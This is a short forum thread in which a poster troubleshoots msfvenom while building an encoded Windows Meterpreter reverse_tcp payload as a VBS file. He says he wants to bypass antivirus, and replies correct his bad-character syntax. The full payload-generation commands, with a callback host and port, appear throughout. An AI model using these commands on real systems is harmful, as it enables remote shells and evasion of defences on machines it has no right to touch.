Metasploit + msfvenom + encoding + issue when I want to avoid bad characters

[oliv66]

Hi all,

When I type this command under kali 1.0.7, it works perfectly.

Code:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=33534 -i 20  -e x86/shikata_ga_nai -a x86 --platform windows -f vbs > example.vbs

However, I would like to avoid some bad characters to bypass antivirus

Usually, I can use -b + The list of characters to avoid: ‘\x00\x0a\x0d’


When doing that, I have an error message I cannot fix it :

Code:

root@kali:~/my_scripts# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=33534 -i 20 -b '\0x00\OxFF' -e x86/shikata_ga_nai -a x86 --platform windows -f vbs > example2.vbs
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
An encoding exception occurred.

Help would be greatly appreciated.

Thanks in advance,

Olivier

[rastamouse]

I don't think you need the 0 after the x. Try '\x00\xff'

[oliv66]

Hi rastmouse,

I tried with and without '0' but I have the same message error.

If I use msfpayload + msfencode, it works with no problem but it should work with msfvenom also.

Regards,

Olivier

[n-quire]

It worked for me after removing the 0 (e.g. -b '\x00\xFF'). Maybe you need to do an apt-get update or something.